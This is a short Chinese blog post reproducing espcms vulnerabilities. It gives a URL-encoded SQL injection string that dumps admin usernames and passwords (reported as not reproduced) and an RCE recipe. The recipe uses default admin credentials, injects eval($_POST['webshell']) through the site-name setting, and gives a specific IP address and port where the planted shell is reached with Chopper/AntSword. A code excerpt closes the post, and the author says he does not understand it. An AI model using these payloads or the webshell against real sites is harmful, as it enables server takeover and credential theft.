欢迎光临企业官网建站网站,提供自助建设系统平台服务

企业官网建站

专业为公司品牌推广建设网站

【espcms】RCE

作者:jcmp      发布时间:2021-04-25      浏览量:0
espcms SQL注入漏洞并未复现成功

espcms SQL注入漏洞

并未复现成功 在网站的搜索入口,进入。后面拼接上如下语句。

&a#r[jobnum]=1%27%20and%201=2%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,concat%28username,CHAR%2838%29,password%29,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45%20from%20espcms_admin_member;%23。

espcms任意代码执行漏洞

0x00 登录网站管理后台

/adminsoft/index.php admin/admin888。

0x01 设置-系统设置-网站基本参数设置

在“网站名称”字段中输入

xx',);echo 'success!';eval($_POST['webshell']);$CONFIG=Array(//

然后点“保存”,虽然提示失败,不用处理。

0x02 访问shell

访问页面,返回"success" http://183.129.189.60:10008/datacache/command.php 菜刀/蚁剑可以连接该shell。

0x03 源码

其实吧,并没有看懂

$db_table = db_prefix . 'config'; $commandfile = admin_ROOT . 'datacache/command.php'; if (!$this->fun->filemode($commandfile)) { exit('false'); } $sql = 'SELECT id,valname,value FROM ' . $db_table . ' WHERE groupid<7 AND isline=0 ORDER BY groupid'; $rs = $this->db->query($sql); while ($rsList = $this->db->fetch_assoc($rs)) { $db_set = "value='" . $this->fun->accept($rsList['valname'], 'P') . "'"; $db_where = 'id=' . $rsList['id']; $this->db->query('UPDATE ' . $db_table . ' SET ' . $db_set . ' WHERE ' . $db_where); } $this->systemfile(true); $this->writelog($this->lng['setting_edit_log'], $this->lng['log_extra_ok']); exit('true');